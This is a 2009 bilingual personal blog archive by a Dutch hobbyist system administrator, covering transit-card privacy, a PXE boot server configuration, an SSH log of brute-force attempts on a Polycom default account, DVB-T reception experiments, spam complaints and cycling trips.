Vandaag reisde ik met de bus naar huis, en de GVU bussen accepteren nu ook de ov-chipkaart dus heb ik dat eens getest. Op zich een goede ervaring en een mooi systeem, alleen het grote bezwaar blijft de privacy van het systeem.
Bij de eerste keer inchecken vroeg ik me bij de tekst goede reis nog af of het verschil met uitchecken wel zichtbaar zou zijn. Maar gerekend vanuit een vervoersaanbieder wens je natuurlijk iemand die instapt een positieve ervaring en is iemand die uitstapt klaar met reizen.
Bij het uitchecken is de tekst tot ziens en de kosten van de reis linksonder en het overgebleven saldo rechtsonder.
Bij de tweede bus zag ik overstap bij het inchecken bij instappen. De chauffeur leek nog wat onwennig te kijken. Communicatie met de chauffeur is nu helemaal niet meer nodig. Voor de meeste buschauffeurs zal dat minder gezellig zijn, gezien de reacties van Amsterdamse buschauffeurs op een "goedemorgen" of "goedemiddag" voor hun juist een vooruitgang.

Maar, de privacy. In de bestanden van Trans Link Systems staat nu de volgende 7 jaar, dus tot 4 september 2016, dat 'mijn' ov-chipkaart op 4 september 2009 gebruikt is om van halte Padualaan naar halte Centraal Station Utrecht stadsbussen te reizen en van Centraal Station Utrecht stadsbussen naar Taagdreef te reizen. Vast met de tijden tot op de seconde er bij. Volgens het privacybeleid van trans-link systems (pdf) gaat het GVU niet zomaar er achter komen wat mijn naam en adres zijn. En volgens de ov-chipkaart veelgestelde vragen:

Trans Link Systems B.V. heeft in haar systemen en organisatie een veelheid aan maatregelen getroffen om de privacy van persoonsgegevens te waarborgen. Zo ook hoe moet worden omgegaan met vorderingen van Jusitie en politie. Uw persoonsgegevens kunnen alleen doorgegeven worden wanneer er sprake is van een officiële vordering van Justitie en/of politie.

Dus het is niet zoals bij het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT) dat elke politie-agent en boswachter ongestoord in die gegevens kan gaan zitten neuzen. Brenno de Winter heeft ontdekt dat Trans Link Systems dit nog lijkt te menen ook: Mag je foto’s van de OV-chipkaart opvragen? - Bigwobber: wie vraagt, krijgt meer. Justitie blijkt dus wel de gegevensverzameling van TLS te zien als aquarium waarin ze uitgebreid mogen vissen, maar TLS was op de hoogte van het verschil tussen een niet-gevoelig persoonsgegeven (naam, adres) en een gevoelig persoonsgegeven (foto). Ik zou aanwezigheid op een bepaalde locatie op een bepaalde tijd ook een gevoelig persoonsgegeven willen noemen wat justitie niet mag opvragen.
Geen woord tussen de veelgestelde vragen over de ov-chipkaart over de toegang door veiligheidsdiensten dus ik neem maar even aan dat die hetzelfde behandeld worden als justitie maar dat daar nooit over gepubliceerd mag worden vanwege de 'staatsveiligheid'.

De gegevensverzameling van de reisbewegingen is natuurlijk een database die alleen maar te beveiligen is tegen misbruik door hem niet aan te leggen en de bestaande gegevens te vernietigen. Er gaan gevallen komen van misbruik. Vissen door justitie wie er ergens geweest is is een eerste misbruik maar er komt vast meer. Want altijd krijg je 'maar die gegevens zijn er toch' voor justitie. Of iemand met toegang tot de gegevens die niet zo integer blijkt te zijn. Wat zou de sanctie zijn voor een beheerder van Translink die een eigen query doet op de database?

Eigenlijk is het helemaal niet mijn ov-chipkaart: het is een verlopen NS-abonnement van iemand anders. Volgens de algemene voorwaarden van de ov-chipkaart (pdf) mag dat helemaal niet:

21. Alleen de Kaarthouder van een Persoonlijke OV-chipkaart mag die OV-chipkaart gebruiken.

maar zolang ik reizen maak waarvoor ik betaal voldoe ik volgens mij aan de wet. En dan hoef ik niet nog een keer voor een ov-chipkaart te betalen.

Je mag van translink systems altijd je ov-chipkaart beëindigen als je het niet eens bent met hun voorwaarden, dan krijg je zelfs het resterende saldo nog terug. Wat ze er alleen niet bij vertellen is hoe je na de volledige invoering van de ov-chipkaart dan nog het openbaar vervoer in Nederland kan gebruiken.

I updated my PXElinux boot menu with a few changes to the pxelinux.cfg/default so there are a number of handy extra booting options:

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Heavy Duty Boot Service
MENU BACKGROUND boot.jpg
# http://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk (default)
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

LABEL pldrescue
MENU LABEL ^PLD Linux rescue
        KERNEL pld-20090221/boot/isolinux/vmlinuz
        APPEND initrd=pld-20090221/rescue.cpi,pld-20090221/custom/custom.cpi root=/dev/ram0 CONF=”`/dev/fd0:/rescue`;;;;;;;;;;;”
        IPAPPEND 1

LABEL ubuntu-i386
MENU LABEL Ubuntu i386 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-i386.cfg

LABEL ubuntu-amd64
MENU LABEL Ubuntu amd64 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-amd64.cfg

LABEL cpuid
MENU LABEL ^Identify Processor
        KERNEL cpuidtest.c32 

The ubuntu submenus are copied from the ubuntu CD's and slightly adjusted to the local situation:

MENU TITLE Ubuntu i386 menu
DISPLAY ubuntu-installer/i386/boot-screens/boot.txt

LABEL install
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL linux
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL expert
        kernel ubuntu-installer/i386/linux
        append priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli-expert
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL rescue
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz rescue/enable=true -- 

LABEL mainmenu
        MENU LABEL Return to main menu
        KERNEL vesamenu.c32
        APPEND ~

The PLD Linux rescue CD is ofcourse based on PXE remote boot for your home/work lab. I tried the Ubuntu 'rescue' mode once but the PLD linux rescue environment works a lot better for me.

One downside of a weblog such as the hcc!pc netwerkgroep website is 'trackbacks' being tried for linkspam. So serendipity is configured to accept trackbacks but keep them all for verification, so visitors don't see all the linkspam left by criminals. The 'score' of about one week of linkspam:

serendipity=> delete from serendipity_comments where status='pending';
DELETE 337

A bit of reading on pxelinux and syslinux and it looks easy to set up my own pxeboot server at home so I don't have to fiddle with floppies, cd-roms or other media anymore.

First of all I wanted the dhcp server to only respond with pxelinux to real pxe clients. There is other stuff which uses dhcp and tftp and might get confused by pxelinux.0 being offered as boot image such as VoIP phones. That can be done with the following in the right context in dhcpd.conf:

    if substring (option vendor-class-identifier, 0, 9) = "PXEClient" {
        filename "/pxelinux.0";
        next-server 10.42.2.1;
    }

Next a tftp server is needed, I installed atftpd serving /tftpboot.

The next part is the menu structure for pxelinux. The following files are in /tftpboot:

root@greenblatt:/tftpboot# ls -lR
.:
total 628
-rw-r--r-- 1 root root  30920 2009-09-01 21:20 boot.jpg
-rw-r--r-- 1 root root 307200 2009-09-01 20:06 boot.png
-rw-r--r-- 1 root root 103204 2009-09-01 21:23 memtest86
-rw-r--r-- 1 root root  35732 2009-09-01 18:29 menu.c32
-rw-r--r-- 1 root root  14146 2009-09-01 17:57 pxelinux.0
drwxr-xr-x 2 root root   4096 2009-09-01 21:34 pxelinux.cfg
-rw-r--r-- 1 root root 122988 2009-09-01 18:29 vesamenu.c32

./pxelinux.cfg:
total 8
-rw-r--r-- 1 root root 117 2009-09-01 18:02 bootmenu.txt
-rw-r--r-- 1 root root 463 2009-09-01 21:34 default

And the content of pxelinux.cfg/default is:

DISPLAY bootmenu.txt

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Remote Boot Services
MENU BACKGROUND boot.jpg
# http://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

Note that the memtest86+.bin image is renamed memtest86: the original filename did not want to boot.

The image of the heavy duty boot is rotated and scaled to 640x480 and brought down in quality. I will probably add the PLD linux rescue CD image and ubuntu so I won't be bothered by boot medium problems anymore. An environment for a heavy duty boot, hence the image.

What do you get when documentation for Polycom SoundPoint IP phones suggests.. and suggests again and again you should set up an ftp account PlcmSpIp with password PlcmSpIp? Well, what do you expect other than:

Sep  1 13:12:44 greenblatt sshd[24658]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:47 greenblatt sshd[24661]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:12:50 greenblatt sshd[24753]: Invalid user PlcmSpIp from 220.132.192.220
Sep  1 13:12:52 greenblatt sshd[24823]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:55 greenblatt sshd[24827]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:57 greenblatt sshd[24832]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:00 greenblatt sshd[24834]: Invalid user PlcmSpIp from 220.132.192.220
Sep  1 13:13:02 greenblatt sshd[24839]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:05 greenblatt sshd[24863]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:13:08 greenblatt sshd[24866]: Invalid user PlcmSpIp from 220.132.192.198

I rather have phones use tftp on a local network and/or http when chances are the setup will be remote.
Update 2009-09-02: And what do I find from someone who has actually configured this for provisioning his phones: Security issue related with PlcmSpIp someone who reports an actual visit on the PlcmSpIp account.

Not too many years ago I only used floppies for starting a system installation and in those cases it was always going through the box with floppies in the hopes of finding one that would successfully format, get the data written and keep it there long enough to boot the target system and get the installation running.

This evening I wanted to do a 'quick ubuntu install' on a harddisk in the server we use for demos of the hcc!pcgg netwerkgroep.

It's now finally installing using the third cd-rom drive. The one in the system did not even want to boot from the ubuntu installation cd, the second one worked ok and then moved and bumped into something while in use and started giving read failures on the same place on the cd while the cd verified fine in another system. The third one I found required a scsi controller, but the Adaptec 2940uw I had around is new enough to offer the option 'bootable cd', is now at least getting through the ubuntu cd-rom self test... and the installation worked. Sheesh. Maybe a pxeboot setup at home is a good idea, with at least a pxeboot version of the PLD rescueCD. But that would need a default do-nothing boot option because at least one client system insists on pxebooting even when it is disabled in the setup.

Wardriving results 13 July - 30 August: 3025 new networks with GPS locations according to the WiGLE stats. I'm still at number 14 at WiGLE. Not much wardriving due to the summer holiday.

Friday afternoon project: trying to make my Palm Tungsten E2 and my Ubuntu laptop talk IP to eachother. It took a bit of searching, but now it is working. It's one of those areas where one should not be afraid of a reboot, the incoming 'LAN access using PPP' kept being rejected until I rebooted the machine. Details added at The Dell Latitude D630 laptop and linux. The PalmOS webbrowser, Blazer, does show up with a weird user-agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/Palm-Zir4; Blazer/4.0) 16;320x320"

Cat-5E cable helps, compared to Cat-5:

eth0: negotiated 1000baseT-HD flow-control, link ok

A new cable for 'connecting something in the living room'. The previous cable was Cat-5 and usually reverted to 100 megabit speed. But the switch and the computer support gigabit so I want that.

Power to the servers: I found out a certain type of 1U server uses 330 watt when fully busy. This is not a problem in itself but a lot of these together do strain the capacity of the UPS without taking up a lot of room. Solution: move systems around to save a bit of power.

Grappig: Introweb komt nu met een IPv6-only adsl aanbod voor een symbolische prijs van 6 euro per maand (dat is minder dan de KPN lijnhuur!). Ik heb al IPv6 via xs4all dus ik laat dit aanbod aan anderen die een goede reden hebben voor een gescheiden IPv6 uplink.

Rob O'Hara writes about part of his BBS history: Multiple Personalities - Rob O'Hara. Great story, I added my memories of the BBS days and how much energy could go into it.

This evening I decided to not stay indoors but to work in the garden a bit. The hazel tree (Nederlands: Hazelaar) needed some serious pruning as it grew a lot last spring. Using the saw I removed a number of 3 meter long branches. I had to stop because it became to dark to work but there still is some work left on the hazel tree. One branch was straight and long enough to keep it for my father-in-law. The rest will be sawed into pieces that fit the boxes we store the wood for burning in.

Zolangzamerhand heeft mijn Nazca Pioneer ligfiets wel z'n eigen pagina verdiend met daarin een overzicht van wat ik er aan onderhoud zelf aan doe.

Bezoekers aan mijn homepage zien al eventjes de IPv6 exhaustion counter in de rechterkolom .. wat verderop naar beneden. Met dank aan de onvolprezen Hurricane Electric voor hun IPv4 exhaustion counters.

Het is echt tijd dat meer mensen nadenken over IPv6 en er iets mee gaan doen. Vooral het netwerk tussen provider en thuisgebruiker heeft momenteel geen werkend IPv6, en daar moet nodig wat aan gedaan worden.

Recente publicatie: Wanneer krijgt IPv6 een gezicht? - Computable

Immediate confirmation of the Twitter rss feed issue: the rss feed did not parse. Indeed, the rss feed was not an rss but a piece of HTML:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0.1">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>

So the little script worked and saved the homepage.

More than one visitor of my homepage saw an intricate XML parsing error and not the page you all want to see. I never saw the problem myself but my best guess sofar is that the twitter rss feed was malformed, because that is the only XML parsing happening for the page. I fetch the twitter feed automatically every 6 hours, but sometimes twitter is a bit overloaded and probably gives an internal error page (the famous fail whale) and not the valid rss feed.

Solution: Fetch the file to a temporary file, run the parser on it and when the parser does not fail, copy it to where the webserver reads it:

#!/bin/sh

wget -O wwwdata/twitter.rss.pre -o /dev/null http://twitter.com/statuses/user_timeline/19301166.rss

perl -MXML::RSS -e 'my $rss=new XML::RSS; $rss->parsefile("wwwdata/twitter.rss.pre");'

if [ "$?" = "0" ]; then
	cp wwwdata/twitter.rss.pre wwwdata/twitter.rss
fi

Terug van vakantie! Korte samenvatting: we zijn met de trein naar Berlijn gereden en we zijn terug naar huis gefietst op de ligfietsen.

Een heerlijke vakantie. Veel dingen gezien. Berlijn is imposant, enorm veel geschiedenis overal in de stad. We hebben een beetje de muur-geschiedenis gezocht met een bezoek aan Museum Haus am Checkpoint Charlie wat al vanaf 1962 de geschiedenis van de muur volgt en de ontsnappingen uit Oost-Berlijn. We hebben een stukje van de Berliner Mauerweg gefietst. Indrukwekkend om het eens te zien. Ik heb in de jaren 80 wel het nieuws over West-Duitsland en Oost-Duitsland meegekregen en de Wende, maar ter plekke de streep door de stad te zien is toch wel anders. Vooral het stuk aan de Bernauer Straße waar ook een tentoonstelling is en nog een stuk muur te bezichtigen. Het blijft een totaal absurd gegeven hoe sterk gescheiden de stad was en hoeveel rare gevolgen daar van waren.

Het fietsen terug ging prima. Perfect weer, veel zon, twee keer een heel klein beetje regen. Wel een paar stevige buien op momenten dat wij lekker binnen zaten. Fietsen in Duitsland lijkt net op fietsen in Denemarken: soms moet je op de doorgaande weg fietsen (Landesstraße) en dat is dan gewoon geaccepteerd, auto's halen netjes in of blijven er even achter hangen als inhalen niet kan. Binnen 2 kilometer in Nederland waren we al ingehaald door iemand die dan 0.5 seconde eerder een erf kon opdraaien. Verder zijn er in Duitsland veel fietspaden en fietsroutes, in voormalig Oost-Duitsland minder, maar wel met een duidelijke groei. Ik had soms wel het idee dat het labeltje fietspad (Radweg) ook aan paden geplakt werd die alleen te fietsen zijn met een goeie mountainbike.

Ook onderweg bezocht: Bunker Kossa wat een oude bunker was van de Nationale Volks Armee, het leger van de DDR. Veel teksten in het russisch, maar eigenlijk viel het ons wel op dat in vergelijking met het Langelandsfort in Denemarken wat we vorig jaar bezocht hebben er een hoop overeenkomsten zijn tussen hoe de Navo-landen en de Warschaupact-landen dingen ingericht hadden.

In totaal 1246 kilometer gefietst deze vakantie, in 14 fietsdagen.

We hebben in Duitsland voor het bellen van onderdak wel gelijk een prepaid-sim gehaald van Klarmobil. Ooit was bellen met Vodafone in het land waar je was aardig goedkoop maar sinds het allemaal goedkoper moet met roaming en simpeler betaal je voor bellen naar Duitsland vanuit Duitsland gewoon het 'Passport' roaming tarief van EUR 0.79/gesprek en EUR 0.25/minuut. De Klarmobil Sim kostte EUR 9.95, gaf 10 euro tegoed en die rekenen EUR 0.09/minuut binnen Duitsland. Op vakantie neem ik zowiezo mijn oudere Nokia 6310i mee omdat die nu nogsteeds een betere batterij levensduur heeft dan mijn huidige toestel, een Nokia 6300.

Onderweg op de fiets zie ik nogal eens oude tv antennes op daken staan die duidelijk niet meer gebruikt worden (allemaal horizontaal gepolariseerd, terwijl alle dvb-t zenders in nederland verticaal gepolariseerd zijn). Misschien dat er daar nog eens eentje tussenzit die ik voor weinig kan meenemen voor meer DX experimenten. Of iemand moet een antenne weten? UHF / VHF band III.

The firewall at work got adjusted to not keep NAT state (cisco-term: xlates) for non-NAT sessions. So now I can run our ntp pool server at maximum speed again without the firewall overflowing its state tables. If you ever run into this problem, the right command is xlate-bypass.

Als je een aanbieding als World's Smallest Portable DVB-T Digital TV (2.4 Inch) ziet vraag je je af waarom KPN mobiele tv of Callmax / Mobiele TV Nederland uberhaupt nog zo moeilijk doen met een apart 'mobiel TV' aanbod via andere technische standaarden (KPN mobiel dvb-h, callmax en mobiele tv t-dmb). Mobiele TV is door internationale aanbieders van apparatuur allang gedefinieerd als kleine DVB-T ontvangers die FTA DVB-T kanalen ontvangen. Nu nog deze wijsheid bij de Nederlandse contentaanbieders en bij de frequentieverdelers.

Seeing another set of DVB-T DX pages by Hans makes me think I should have a look at parsing the vdr files from w_scan into an automatic DX logbook, noting when muxes are first found. I collected the output files since 3 January 2009. I started doing that after I saw the WDR program at 674 MHz so that was not logged in that format. Documentation: VDR file format.

Gisteren gingen we (lig) fietsen en bij het plannen van de route namen we een item van mijn foto wensenlijst mee: we zijn langs de Gerbrandytoren gefietst, bekend als zendmast Lopik te IJsselstein.

Gelukt.. Zendmast lopik te IJsselstein / Gerbrandytoren

Meer informatie over de Gerbrandy Toren: De Gerbrandytoren te IJsselstein Gerbrandytoren - Wikipedia Nederland
De zendmast is natuurlijk bekend van de rol als de grootste kerstboom van de wereld als aan het eind van het jaar de tuidraden voorzien worden van lampjes. Altijd in TV-gidsen gestaan als 'Lopik' maar door een gemeentelijke herindeling ooit van Lopik naar IJsselstein 'verhuisd'.
Ook leuk is om op te graven in de geschiedenis hoe hard Nederland 1, 2 en 3 ooit over ons uitgestrooid werden: het Nozema TV frequentieoverzicht uit 2002 geeft 100, 1000 en 1000 kiloWatt ERP (!). Dat gaat nu met 10 kiloWatt per DVB-T multiplex.

In the dvb-t scan yesterday evening late:

TV Gelderland :642000:I999B8C999D999M999T999G999Y999:T:27500:7041:7042:7043:0:1104:0:0:0
Radio Gelderland:642000:I999B8C999D999M999T999G999Y999:T:27500:0:7112:0:0:1111:0:0:0

Part of Digitenne bouquet multiplex 1 at 642 MHz. The transmitter could be Oss or Veenendaal given distance and transmitter power. I only noticed it yesterday but now I see it in the w_scan output a few times. The reception is not error-free (I had to wait a bit for a chance of a screenshot with not too much distortion).

No extra foreign channels from the dvb-t scans.. yet. I keep an eye on the tropospheric ducting forecast for northwest europe. I also updated the DVB experiments page with the DX results.

Bouquet or Multiplex? It is described as bouquet at DVB-T zenders Digitenne Nederland but the mpeg standard term for multiple program streams in one transport stream is 'multiplex'. Bouquet in DVB terms means a set of 'programs' logically grouped together.

Tijd om wat aan mijn ligfiets te doen: het stuur was verbogen geraakt, vermoedelijk als gevolg van een harde val. Het nadeel van aluminium: daar buig je weinig aan terug. Maarja, het is zoveel lichter. Ik heb op Cycle Vision een praatje gemaakt met de mensen van Nazca Ligfietsen en die konden heel snel een vervangende stuurbocht opsturen. Mijn vraag was natuurlijk hoe ik het stuur uit elkaar moest halen, vooral de (de)montage van de bar-end shifters was me niet duidelijk. Bij de Shimano techdocs site kon ik de gewenste documentatie en tekeningen vinden, en toen was het ineens allemaal wel duidelijk. Stuur gedemonteerd, alle tie-wraps er af, oude stuurbocht eruit, nieuwe stuurbocht er in en weer alles gemonteerd. Ik denk alleen dat ik voor de vakantie ook nog remkabels wil vervangen. Het is wel een lekker gevoel om je eigen fiets gerepareerd te hebben.

I redid a bit of pictures.idefix.net and made a few extra collections public that are public anyway. Now for the wish-list of pictures to take...

What you don't want to see in your data center: Photos: Inside the Fisher fire - Techflash. One interesting effect from that fire was: TV station forced to go old school after fire at Seattle's Fisher Plaza. Found via The Risks Digest.

Time for some website programming: Amazon was notifying me that Amazon 'Product Advertising API' requests (formerly known as Amazon Web Service) now need to be digitally signed. The 'why' of this is probably something with security. For the 'how' I had to revive those braincells which once programmed Amazon Web Service into The Virtual Bookcase. Those braincells took time as I was first browsing in the wrong sourcefiles. But, after having a peek at Jaap's free Amazon PHP Scripts and incorporating the change to sign requests into my sources, I found the right way again.

One of those times I am glad I have a development version of the site (smaller database, code in development), a qa version (production database, candidate code) and a running version (production database, production code) to test changes like this. The visitors of The Virtual Bookcase never saw all the tries in getting the code to work right.

It was a while since I did any serious work on that site. Otherwise it runs on autopilot and I only add new books and reviews from time to time. Ok, the income from the site has dropped in the same way.

Aankondiging vandaag in xs4all.general: Tour de France via IPv6. Streaming via IPv6, het kan... voor xs4all klanten. Goed om te zien dat omroep.nl weer actief is met innovatie. Net als een vorig experiment (Nederland 1 HD via multicast) wordt het pas aangekondigd als het evenement al een aardig stuk onderweg is, wat meer met rechten te maken heeft dan met de techniek.
Update : De stream met beeld is alleen beschikbaar tijdens de etappe overdag en tijdens de 'avondetappe'. De radio1 stream doet het de hele tijd, die heb ik dus al succesvol beluisterd vanaf thuis.

Wardriving results 22 June - 12 July : 829 new networks with GPS locations according to the WiGLE stats. The only special wardrive was a ride together with another wardriver to Enschede. I had the 802.11a scanning enabled, he had a different antenna type.

Some websearching suggests my headaches with mISDN could be solved by using the qozap driver which I get when I compile zaptel-sources. Just a bit of configuring asterisk differently... time to find some time for that somewhere.

Yesterday evening I installed a 6-tape DDS-3 changer in the homeserver greenblatt and activated the latest ubuntu kernel updates. The tape changer works great but the mISDN drivers got confused because the 'loading drivers' stage at boot loads them without the right parameters which results in confused drivers (hardware not found) which I can't unload because that causes a kernel panic. Workaround: remove the mISDN drivers, reboot the system, reinstall the mISDN drivers and let /etc/init.d/mISDN load the drivers in the correct way.

I caught the Omroep Brabant logo last night: after dark reception is a lot better! The Digitenne B1 bouquet at 546 MHz and Digitenne B2 at 786 Mhz scanned fine.

I took some pictures of the log-periodical antenna which improved the reception of dvb-t stations in the area and updated the DVB experiments page with them. A big thankyou to Alan Yates for doing the calculations for the UHF log-periodic antenna which has been built by several other hobbyists.

Het artikel Regering dreigt digitale (ether)televisiemarkt te verstikken van David de Jong geeft aardig weer wat er mis is met de televisiemarkt in Nederland. Ik heb er zelf mijn commentaar nog aan toegevoegd dat ik veel meer zie in mogelijkheden voor free-to-air lokale omroepen via dvb-t dan voor dvb-h (mobiel TV) wat eigenlijk voor een deel een kopie is van wat er al via dvb-t gedistribueerd wordt. Ja, Nederland is een land met heel veel buren die ook iets willen en heeft dus maar heel beperkte frequentieruimte. Maar dat alleen maar gebruiken voor mobiele telefonie is jammer.

Het is een regenachtige dag vandaag, maar de neerslagradar van het KNMI heeft momenteel geen data, en buienradar.nl is maar naar de backup-methode overgeschakeld, zo te zien duitse radar. Op de webcam zijn de buien te zien die voorbij trekken.

Afgelopen weekend zijn we op Cycle Vision 2009 geweest. Een evenement van de Nederlandse Vereniging voor Human Powered Vehicles. Ik ging daar vooral heen om te fotograferen. Een internationaal gezelschap van ligfietsers die in diverse evenementen competitie streden leek me wel kans te geven op mooie plaatjes. Na een selectie uit de overvloed die op de geheugenkaarten stond: Cycle Vision 2009 Tilburg.
Ik ben zelf erg tevreden over deze: handbike tijdens uursrace Cycle Vision 2009 Tilburg

Nice sample in the spam of what is in Dutch called acquisitiefraude (aquisition fraud?). Trying to make companies pay for being in some 'register' where nobody looks. From the spam e-mail:

In order to have your company inserted into the registry of World Company Directory for 2009/2010, please print, complete and return the enclosed form (PDF file) to the following address:

With the detail:

Updating is free of charge!

Well, updating may be free, insertion isn't when reading the small print in the PDF:

I HEREBY ORDER A SUBSCRIPTION WITH SERVICE PROVIDER WORLD BUSINESS DIRECTORY LTD. I WILL HAVE AN ENTRY INTO ITS DATABASE FOR THREE YEARS. THE PRICE PER YEAR IS EUR 980.

Spammers and frauds nicely working together, not a surprise.

"World Company Directory" melding bij steunpunt acquisitiefraude

The log-periodical antenna has effect: a number of signals show workable data in w_scan. New:

490 MHz - Digitenne B3 from probably Lelystad
514 MHz - Digitenne B1 from Lelystad, including TV Flevoland / Radio Flevoland
682 MHz - Digitenne B4 from Lelystad

And with aiming and trying (3 windows with dvbsnoop for pid 0x00, 0x10 and 0x11, one window with tzap reading the signal strength):

546 MHz - Digitenne B1 including Omroep Brabant, source unknown

Updated the DVB experiments page with the latest findings. Time to take pictures of the antenna I built.

So, who is this nobody user anyway? Porting account-management scripts from Centos linux to ubuntu made strange problems show. A short check found interesting differences. After asking around on irc and trying some things I found quite a choice:
Centos linux:

nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Ubuntu linux:

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

FreeBSD 6.1:

nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin

Solaris:

nobody:x:60001:60001:Nobody:/:

Interesting is that creating a file as root on a solaris nfs client will create it as 65534:0. Data Ontap:

pw_name = nobody
pw_passwd = 
pw_uid = 65535, pw_gid = 65535

First success with the self-built antenna: I tried it in the 'home office', approximately 5 meters above ground, north-east direction. With the log-periodical antenna pointing outside through the window I was able to receive Digitenne bouquet 1 at 618 MHz UHF, which includes radio and TV Noord-Holland.

A spammer on the block named Facebook. And I'm not talking about spamming in facebook, I'm talking about spam from facebook in my mailbox, disguised as an 'invitation'. From the e-mail:

I set up a Facebook profile where I can post my pictures, videos and events and I want to add you as a friend so you can see it. First, you need to join Facebook! Once you join, you can also create your own profile.

PREMIER SITE DE RENCONTRE 100% GRATUIT. chat,envoie de mails,inscription,photos, envoie de vos coordonnées personnel aux autres membres .......tous les services sont GRATUITS sur notre site de rencontre

Some French-language website (on facebook? redirecting somewhere else? I have to register with facebook to find out: no way). And, at the bottom:

******@ruu.nl was invited to join Facebook by Azza Ava. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.

That e-mail address points at a role-account here (and given the fact that the @ruu.nl version is used means a really old spammer list is used too). So it has never been subscribed to anything from Facebook. No need to unsubscribe, this is pure spam. According to whois for the sender-IP:

NetRange:   69.63.176.0 - 69.63.191.255 
CIDR:       69.63.176.0/20 
OriginAS:   AS32934
NetName:    TFBNET2
NetHandle:  NET-69-63-176-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS04.SF2P.TFBNW.NET
NameServer: DNS05.SF2P.TFBNW.NET
Comment:    Contact abuse@facebook.com with issues.
RegDate:    2007-02-07
Updated:    2009-03-04

I am not fully convinced their abuse department is going to change their system not to annoy random e-mail accounts with invitation-spam. Time to notify uplink providers too that there is a spammer in the house.
Update: the nice autoreply from abuse at facebook tells me all about privacy on facebook and stuff like that. Bzzzzt, wrong answer! I'm from the non-facebook world and I don't want your invitations. I'll discuss this with your uplink providers. They have the wire-cutters to really deal with the problem.
Update^2: According to the facebook abuse department the mail was faked and not really from facebook. I disagree: the headers show an outgoing facebook mail server.

Ooit, lang geleden toen ik nog het blad Computer!Totaal onvermijdelijk kreeg bij het HCC lidmaatschap heb ik op het bijbehorende forum begin 2004 wat reacties gepost over artikelen. Vandaag kreeg ik om 13:03 ineens e-mail op het adres van de forum registratie over het Grote Merkenonderzoek van ComputerTotaal.
Daar was die forumregistratie niet voor, dus ik volg gelijk de link om geen e-mail meer te ontvangen, een typische link met cryptografische hash. Op de site (waar het goeie e-mail adres staat, dus de link was inderdaad gepersonaliseerd) blijken 4 categorieën te zijn waarin je e-mail kunt krijgen waarvan 2 aangevinkt. Ik wilde niets meer te maken hebben met Computer!Totaal of IDG dus heb ik ze gelijk uitgevinkt. Dan krijg je een nieuwe link in je e-mail om die wijzigingen te bevestigen.. waarom? Zijn ze bang dat iemand anders de link misbruikt om hun e-mail te stoppen? Een beetje overkill na die eerdere link met cryptografische hash. Die bevestiging natuurlijk gedaan om 13:24.
Vervolgens krijg ik om 16:01 weer mail, dit keer voor het 'Tips & Trucs forum' wat graag een nieuwsbrief kwijt wil. De link om mijn 'voorkeuren voor het onvangen van e-mail van Tips & Trucs te wijzigen' levert op dat daar weer 4 categorieën zijn waarvan 2 aangevinkt. Dus nog meer spam e-mail uit die hoek.
Dan vraag ik het niet meer lief, blijkbaar zijn Computer!Totaal / IDG uitgevers / Tips & Trucs gewoon spammers. Ok, daar kan ik gewoon een klacht over indienen, dat is ook een stuk minder werk.

Wardriving results 13 June - 21 June: 2004 new networks with GPS locations.

Several times when I scanned for DVB-T signals in the UHF band from home I saw some very weak signals on several frequencies. Too weak to make out anything other than that the signals are very probably DVB-T as the radio scanner does not pick up a thing there (for as far as I know FM receivers cannot pick up QAM signals). The DVB-T receiver I use has a small external antenna (simple half-wavelength wire), so to get more signals I will have to use a good antenna. Buying something is expensive and it is to me much more interesting to build something myself from scrap materials. Most promising seems to be Alan Yates' Laboratory - UHF Log-Periodic Array so I'm browsing my scrap electronics for materials to build this.

The empty slot I found before in a dvb service scan where BemBem used to be is now:

0x0000 0x0072: pmt_pid 0x0474 Digitenne -- 100%NL (running, scrambled)

As reported by radio-tv-nederland.nl.

